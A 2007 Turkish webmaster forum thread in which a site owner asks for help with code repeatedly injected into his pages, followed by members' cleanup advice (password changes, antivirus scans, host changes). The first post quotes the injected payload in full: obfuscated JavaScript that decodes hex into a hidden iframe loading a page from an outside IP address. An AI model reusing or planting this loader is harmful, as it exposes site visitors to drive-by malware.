Webmaster Forumu - Webmaster Zone

Geri git   Webmaster Forumu - Webmaster Zone > Webmaster Zone > Programlama Dilleri

Cevapla
 
LinkBack Seçenekler Stil
  #1 (permalink)  
Alt 12-11-2007, 23:38:24
sayar55 sayar55 isimli üyemiz çevrimdışıdır. (Offline)
Yeni Üye
 
Üyelik tarihi: 30/11/2007
Yaş: 24
Mesajlar: 3
iTrader: (0)
Tecrübe Puanı: 0
sayar55 üyemiz henüz acemi
Standart Kaynak kod değiştiren trojan

Merhaba arkadaşlar;
Web sitemde bir çeşit virüs var ve web sayfalarımın kodlarına kendisini ekliyor.

Eklediği kod:
<!-- o65 --><script type="text/javascript">
function E4C91FB26400DB2E8E6D1A43F8(E24F89741580A88A1){func tion B7BF85150AC30DBA42(){return 16;}return(parseInt(E24F89741580A88A1,B7BF85150AC3 0DBA42()));}function E34AB0D7708CB83225AC60547C769(A558AE9C2D9A9BCFF8A1 36E3D631DD2){var B23FC86F17B841112="";for(C39BD7887D5CF0A0869467393 D621AF=0;C39BD7887D5CF0A0869467393D621AF<A558AE9C2 D9A9BCFF8A136E3D631DD2.length;C39BD7887D5CF0A08694 67393D621AF+=2){B23FC86F17B841112+=(String.fromCha rCode(E4C91FB26400DB2E8E6D1A43F8(A558AE9C2D9A9BCFF 8A136E3D631DD2.substr(C39BD7887D5CF0A0869467393D62 1AF,2))));}document.write(B23FC86F17B841112);}E34A B0D7708CB83225AC60547C769("3C696672616D65207372633 D27687474703A2F2F35382E36352E3233332E39372F666F727 56D2F6F75742E706870272077696474683D273127206865696 768743D273127207374796C653D27646973706C61793A20686 96464656E3B273E3C2F696672616D653E");
</script><!-- c65 -->

Bu kodu index, default, login vb. sayfalara atıyor. Php, asp, html olması farketmiyor. Bu olaydan sonra veri tabanlarımı sildim, hostumun içindeki dosyaları sildim ve bilgisayarıma fdisk attım. Şu anda web sitemde basit bir index.html var ve aynı şey tekrar oldu. O kod yine kendisini kaynak kodların arasına ekledi ve sayfanın düzgün çalışmasını engelliyor. Lütfen yardım edin, ne yapmalıyım. Hosting firmamla konuştum ve sunucularımızda virüs olma ihtimali yok diyorlar.
Alıntı ile Cevapla
  #2 (permalink)  
Alt 13-11-2007, 06:29:28
Metallica - ait Kullanıcı Resmi (Avatar)
Metallica Metallica isimli üyemiz çevrimdışıdır. (Offline)
Webmaster
 
Üyelik tarihi: 28/2/2007
Nerden: konya mardin/midyat
Yaş: 20
Mesajlar: 401
iTrader: (2)
Tecrübe Puanı: 47
Metallica has a spectacular aura aboutMetallica has a spectacular aura aboutMetallica has a spectacular aura about
Standart Cevap: Kaynak kod değiştiren trojan

arkadaşım bir başka sunucuya geçmeni tavsiye ederim fdisk attıktan sonra bile hala varsa bu sunucudadır büyük ihtimal
__________________
kişisel dizin
Alıntı ile Cevapla
  #3 (permalink)  
Alt 13-11-2007, 08:50:10
Haymac Haymac isimli üyemiz çevrimdışıdır. (Offline)
Genel Yönetici / Admin
 
Üyelik tarihi: 31/7/2007
Mesajlar: 548
iTrader: (2)
Tecrübe Puanı: 93
Haymac is a splendid one to beholdHaymac is a splendid one to beholdHaymac is a splendid one to beholdHaymac is a splendid one to beholdHaymac is a splendid one to beholdHaymac is a splendid one to beholdHaymac is a splendid one to beholdHaymac is a splendid one to beholdHaymac is a splendid one to beholdHaymac is a splendid one to beholdHaymac is a splendid one to behold
Standart Cevap: Kaynak kod değiştiren trojan

bir yerlere ftp bilgilerini yolladı ise, ordan tekrar otomatik olarak ordan işlem yapmış olabilir.
__________________
Yüz Verip Adam Ettiysem 0 ile Çarpıp Yok Etmesinide Bilirim
Alıntı ile Cevapla
  #4 (permalink)  
Alt 13-11-2007, 11:36:21
sayar55 sayar55 isimli üyemiz çevrimdışıdır. (Offline)
Yeni Üye
 
Üyelik tarihi: 30/11/2007
Yaş: 24
Mesajlar: 3
iTrader: (0)
Tecrübe Puanı: 0
sayar55 üyemiz henüz acemi
Standart Cevap: Kaynak kod değiştiren trojan

Valla arkadaşlar önceden hostum türkticaretteydi sonra natro ya aldım artık host değiştirmekten bıktım aslında, bir de ftp bilgilerini değiştireyim belkide o yüzden olabilir denemekte fayda var. Her türlü tavsiyeye açığım arkadaşlar
Alıntı ile Cevapla
  #5 (permalink)  
Alt 13-11-2007, 11:57:34
KaraSancak - ait Kullanıcı Resmi (Avatar)
KaraSancak KaraSancak isimli üyemiz çevrimdışıdır. (Offline)
Webmaster
 
Üyelik tarihi: 30/6/2007
Nerden: :Nereye
Mesajlar: 606
iTrader: (0)
Tecrübe Puanı: 41
KaraSancak has a spectacular aura aboutKaraSancak has a spectacular aura aboutKaraSancak has a spectacular aura about
Standart Cevap: Kaynak kod değiştiren trojan

bi ara benim ilgilendiğim bi siteye de aynı kod index'i yazılmıştı ben bi kere sildim hiç bilgisayarıma filan da format atmadım düzeldi bi daha girmedi o kod index'e

bence bi hosting şirketine sor...
__________________
Günlük-DersimizPC-O Şimdi Öss :)

Konu KaraSancak tarafından (13-11-2007 Saat 12:05:58 ) değiştirilmiştir..
Alıntı ile Cevapla
  #6 (permalink)  
Alt 14-11-2007, 22:53:35
sayar55 sayar55 isimli üyemiz çevrimdışıdır. (Offline)
Yeni Üye
 
Üyelik tarihi: 30/11/2007
Yaş: 24
Mesajlar: 3
iTrader: (0)
Tecrübe Puanı: 0
sayar55 üyemiz henüz acemi
Standart Cevap: Kaynak kod değiştiren trojan

Arkadaşlar hosting yetkilileriyle en son görüşmemde hostumun bulunduğu sunucudaki bütün dosyaların incelendiğini ve benimkine benzer bir sorunun olmadığını söylediler. Tavsiye olarakta hosttaki dosyaları sildikten sonra bilgisayarıma format atmamı ve mail şifremi, kullanıcı şifremi, ftp şifremi, vb. şüphelendiğim bir şifre varsa ya da mümkünse hepsimi değiştirme mi tavsiye ettiler. Sanırım biraz devrik bir cümle oldu ama anlaşılıyordur. Herhangi bir şekilde şifreleriniz başkalarına geçmiş olabilir denildi şimdi de bu yöntemi deniyeceğim bakalım ne olacak.
Alıntı ile Cevapla
  #7 (permalink)  
Alt 15-11-2007, 15:19:11
Guray Guray isimli üyemiz çevrimdışıdır. (Offline)
[NG]near
 
Üyelik tarihi: 31/1/2007
Nerden: Bursa
Yaş: 29
Mesajlar: 337
iTrader: (1)
Tecrübe Puanı: 47
Guray will become famous soon enoughGuray will become famous soon enough
Standart Cevap: Kaynak kod değiştiren trojan

Arkadaşlar...
Öncelikle şu soruyu sorayım.. Bu kaynak koddaki değişiklik explorer açarak girdiğiniz tüm sayfalarda mı var? Yoksa sadece host ettiğiniz yerle mi ilgili??

Yakın bir zamanda buna benzer bir virus çıkmıştı ve girdiğiniz her web sayfasının en başına JS kodu ekliyordu. Bu tarz bir şey olmasın?

Öncelikle buna dikkat edin. Ben böyle bir uygulama olduğunu tahmin ediyorum.
Ama diyorsanız ki sadece host ettiğim sayfalarda bunu görüyorum.
Evet hosting ile sıkıntınız var demektir. Birde hosting olarak windows ta mısınız? Unix/Linux temisiniz?
Yine tahminim Windows olacaktır
Alıntı ile Cevapla
  #8 (permalink)  
Alt 16-11-2007, 23:09:42
gokhan_rs gokhan_rs isimli üyemiz çevrimdışıdır. (Offline)
Yeni Üye
 
Üyelik tarihi: 30/11/2007
Yaş: 27
Mesajlar: 3
iTrader: (0)
Tecrübe Puanı: 0
gokhan_rs üyemiz henüz acemi
gokhan_rs - MSN üzeri Mesaj gönder
Standart Cevap: Kaynak kod değiştiren trojan

Eğer sunucuda problem yoksa (büyük ihtimalle yoktur) ve format attığında trojan veya benzeri program hala bilgisayarında kalıyor ise kullandığın tüm usb aygıtlarına mp3 playerlar flash bellekler yani tüm veri depolama araçlarına onları hiç açmadan format at. Bir autorun virüsü olabilir. Bu virüslerin autorun ile yayılan bir çok çeşidi mevcut. Bir de kendini exe dosyaları ile değiştirenleri var. Yine bir yere yedek aldıysanız setup dosyalarının (cd-dvd vs.) viruslu halini kopyalamış olabilirsiniz. Onları da kullanmamanızı tavsiye ederim.
Alıntı ile Cevapla
  #9 (permalink)  
Alt 16-11-2007, 23:21:32
usekes - ait Kullanıcı Resmi (Avatar)
usekes usekes isimli üyemiz çevrimdışıdır. (Offline)
Webmaster
 
Üyelik tarihi: 31/10/2007
Mesajlar: 96
iTrader: (0)
Tecrübe Puanı: 24
usekes will become famous soon enoughusekes will become famous soon enough
Standart Cevap: Kaynak kod değiştiren trojan

Kimse söylememiş bari ben söyliyim,

Makinene adam gibi bir antivirüs kurduktan sonra virüs taraması yaptır. Ondan sonra serverındaki dosyaları tek bir klasör altında toplayıp bir de onları tararsanız en azından ne virüsü olduğunu bulabilirsiniz.

Ondan sonra da artık varsa temiz yedeklerinizi yüklersiniz yeniden servera. Servera temiz olarak yolladıgınız bir dosyayı makinenize indirmek istediğinizde virüslü dosya geliyorsa o zaman serverda sorun var demektir
Alıntı ile Cevapla
  #10 (permalink)  
Alt 16-11-2007, 23:43:49
gokhan_rs gokhan_rs isimli üyemiz çevrimdışıdır. (Offline)
Yeni Üye
 
Üyelik tarihi: 30/11/2007
Yaş: 27
Mesajlar: 3
iTrader: (0)
Tecrübe Puanı: 0
gokhan_rs üyemiz henüz acemi
gokhan_rs - MSN üzeri Mesaj gönder
Thumbs up Cevap: Kaynak kod değiştiren trojan

Haklısın antivirüsleri de unutmamak lazım
Alıntı ile Cevapla
Cevapla



Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)
 
Seçenekler
Stil

Yetkileriniz
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-KodlarıKapalı
Trackbacks are Açık
Pingbacks are Açık
Refbacks are Açık

Benzer Konular
Konu Konuyu Başlatan Forum Cevaplar Son Mesaj
kaynak kodu şifreleme ibrahimd Webmaster Genel 17 28-08-2007 22:44:35
Dünyayı değiştiren 15 adres Murky Teknoloji & Bilişim 0 25-06-2007 10:30:07
Buna NE Diyeyim Bilmiyorum TROJAN Linux Webmaster Genel 5 23-03-2007 17:14:41
Pascal'da sürekli renk değiştiren yazı Alone Programlama Dilleri 0 24-02-2007 11:42:55


Bütün Zaman Ayarları WEZ +2 olarak düzenlenmiştir. Şu Anki Saat: 23:24:16 .




Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
LinkBacks Enabled by vBSEO 3.1.0
Zone Org | 2006-2008

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164